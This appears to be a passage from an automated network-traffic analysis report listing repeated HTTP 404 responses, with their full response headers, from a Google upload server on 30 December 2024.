                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7G8SdNediIpT0W-01uWdxkxqCWE7_sr1ysxIQ2G5Xjp_9jicON_K65UQZ1PuWWcMXAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:20 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-C2nWOD6b96qt89Z-xGnMYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC52rF_xx1KBvR42FAZ2To7lJHC1zJSPO3e0RZU5b_3nJKySWEdZIdMgducHTGvu0fR1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:21 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-YLzlh8RQMOKfdJbWLTZTPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ZzpH_PRKwm7S3U1Q3VBOPTVlCdsxAaQzutyrdsDbnuVgaIduMLL2YW3SGzNh_24OZE4GfK7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:21 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce--Y_TkK58AyWWG510jGnlrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6DtdxX0HfGqBdN9JQdf5u6pGQP-mtFSD6oBkzwRl2ljJt7iMuBmyKFGM1wcuCWcvNgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:23 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-w-TeeP7x87waurlIzFWmAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5n0G5tNyIX3etzRQQgrbRvY6n3oGyNqiAR4bMD0n6QlxQudw4ZmGjzUdp7tGD-jhWT2ue_zlkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-lUWRLMMzJ9ivwSm7dh8XFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4H4VR5w0vgfHNkE9QxlZz-m6NQDarExmjREo0agStsIkxyzWU8GDvChT-Nmp3XrYzIMKxoeSoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:24 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-DJkHrQPF-B_uqIzBIMYD6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7mxWd8Z6BWUCwv_CjW7Jcgxy7gNTRVncBmUB-gO7FfUu99lzjLLScBi0hkNYbZUgeLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-YCAuPFvNnFEAmjuiGSBrHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UyZsF_mXlw-43fmeeAzOzQYum_fvH3N5b8ak9C_ESK7tsRE5uKSULguxfhO3MsJ1PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:25 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-eou_f10_inLlsUM-_pvfKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7j1SQL4JDdilezfaPjD2nDzWt4kKQiO46GFwsr9pj72vTm7a7JsB5TP0F0FQ1i9S_jC5yVh2QContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:28 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-jfa4umS9FLhKm9IemAt-5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5p634Q_jv4AS5kkzUa4hr5VywC0_onH_88fOzWAciCGWBu6Cv_8aAwUXyLuZTgQLpKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-58iI0InlkdYM1SC44EJxpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6hnqh51GdKCNBnFWaW1Sglle7U5nvTvTnVp0PrGqIPVlGmUGZhmQg7z4stk8F-ruKIjyZmObsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-J9s_9_F69sD6dLIRUWzDjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DSABYVvgpI16rjiI9YUsrgx7hW2-BlU5W0X5Lf1_46vrorU1XOuGzZhlhA52oJXNqvigII1UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-kb6n-u-EIe6C4EJKz8M1Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6QCscMYmsa8bGB0mRiEaMsNJwN5TU7hiToufBLqKYHw2nw01MCNgTOtPljUMVuLQCCk6JsFMcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-85a0AfR9hHarJ5NF9Q618Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4mBpxEYhLgl5Cs5mrbElvHTfKr4M2cKFLMutf0OkuZ4ZpvYYzH__BKp7zNxO2ts-t4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-boAdy9AJ2PkJn2mayt4JfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4WPBgHt9vIUZK99g038ABuJ_VX1M6TSa5DFTHTKwZShXPphdLyYL-ofYOd-fS2bKDZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-37OIWwnSQ6xzsPp6UuXoBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62ktt3FjI-YsePMaq70mzB8lWWnzdRgIeEoh2K9XVT9wc5UXNmTwuOc2LUG6Wa8fzqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:33 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-olwRQhBOL3z26I4KmfU2UQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4SldqoJVino5WSWuTpw86WRF1RDmsp8b9M-0YSs-NYJbo0ned9MzeHt4zeYoi59obnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-kiZNsJpqhb4U9vtISJ2ouQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6UXG5cuXAFnxQqNg1L-4y-4w2uLm9I7XXGRkF0p2cUPcBi6uagLX7IjXY5bwV5_h9Qtmsv-f0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:34 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-bmLz4GIOjPJn-v2j61E3zQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62ytW1rXfJuk5LPnNGs8nHThcjxhrE433SIaNPRKtfKz8nabzGjdQS5qZumlLiLIbjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:36 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-04YpyNTY6X-88V7VBwqYYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5SlqEXPGMQdLzOQ5vYeoe5rffw95IvpX6we9hvig-FjAyeUlhL4Jf3rrv4mHpDc9ELContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-wI_O-LoClKzt_-3tXztISw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
